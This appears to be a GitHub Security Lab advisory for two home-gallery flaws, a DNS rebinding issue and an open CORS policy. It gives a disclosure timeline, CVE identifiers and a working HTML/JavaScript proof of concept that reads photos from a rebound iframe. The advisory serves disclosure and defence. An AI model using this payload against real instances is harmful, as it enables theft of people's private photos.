Coordinated Disclosure Timeline
- 2024-06-12: Vulnerability reported via Private Vulnerability Reporting
- 2024-07-06: Maintainer responds saying TLS should be enabled by the user. Reporter responds with many solutions to fix this issue via code, such as checking the host header or adding authentication.
- 2024-10-29: No followup after three replies asking for updates. Maintainer informed that the advisory will be released publicly in the coming weeks if no response.
Summary
Home-gallery is vulnerable to DNS rebinding attacks and implements a broad CORS policy that may make it vulnerable to present or future attacks.
Project
home-gallery
Tested Version
Details
Issue 1: DNS rebinding attack (GHSL-2024-091)
The default setup of home-gallery is vulnerable to DNS rebinding. Home-gallery is set up without TLS and user authentication by default, leaving it vulnerable to DNS rebinding. In this attack, an attacker will ask a user to visit their website. The attacker website will then change the DNS records of their domain from their IP address to the internal IP address of the home-gallery instance. To tell which IP addresses are valid, we can rebind a subdomain to each IP address we want to check, and see if there is a response. Once potential candidates have been found, the attacker can launch the attack by reading the response of the web server after the IP address has changed. When the attacker domain is fetched, the response will be from the home-gallery instance, not the attacker website, because the IP address has been changed. Due to a lack of authentication, home-gallery photos can then be extracted by the attacker website.
Impact
This issue may lead to Information Disclosure. An attacker can leak the photos from home-gallery instances located on the same intranet as the victim.
Proof of Concept
An attacker can host the following html page on attacker.com:
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<div class="center_div">
<h1>Testing IFrame</h1>
</div>
<script>
setInterval(function() {
var a = document.createElement('iframe');
a.src = "attacker.com"; //add your iframe attacker url here
a.width = "1000";
a.height = "1000";
a.id= "here"
document.querySelector('body').appendChild(a)
console.log("Added iFrame");
console.log("Waiting 10 seconds");
setTimeout(function()
{
document1 = document.getElementById('here').contentWindow.document
var imgs = document1.getElementsByTagName("img");
var imgSrcs = [];
for (var i = 0; i < imgs.length; i++) {
imgSrcs.push(imgs[i].src);
}
console.log(imgSrcs);
for (var i = 0; i< imgSrcs.length; i++) {
fetch(imgSrcs[i], {
method: 'GET',
})
.then((response) => response.blob())
.then((blob) => {
const imageUrl = URL.createObjectURL(blob);
const imageElement = document.createElement("img");
imageElement.src = imageUrl;
document.querySelector('body').appendChild(imageElement);
});
}
here = document.getElementById('here');
here.parentNode.removeChild(here);
console.log("Removed iFrame");
}, 5000);
}, 10 * 1000); // 60 * 1000 milsec
</script>
</body>
</html>
When the victim the attacker website, a script can be run to automatically change the DNS record of attacker.com. This html page contains a hidden (not hidden for demo purposes) iframe that will open the attacker’s website again, but this time when the DNS record has been changed to the home-gallery instance. The iframe will show the home-gallery home page, and a script in this html page will read from the iframe, thus extracting the users’s private photos.
Issue 2: Open CORS policy (GHSL-2024-092)
An open CORS policy in app.js may allow an attacker to view the images of home-gallery when it is using the default settings.
function createApp(config) {
const app = express();
app.use(cors())
The following express middleware allows any website to make a cross site request to home-gallery, thus allowing them to read any endpoint on home-gallery. Home-gallery is mostly safe from cross-site requests due to most of its pages requiring JavaScript, and cross-site requests such as fetch() do not render javascript. If an attacker is able to get the path of the preview images which are randomized, an attacker will be able to view such a photo. If any static files or endpoints are introduced in the future that contain sensitive information, they will be accessible to an attacker website.
Impact
In rare cases, this issue may lead to Information Disclosure.
Resources
CVE
- CVE-2024-53275 - GHSL-2024-091
- CVE-2024-53276 - GHSL-2024-092
Credit
These issues were discovered and reported by GHSL team member @Kwstubbs (Kevin Stubbings).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2024-091 or GHSL-2024-092 in any communication regarding these issues.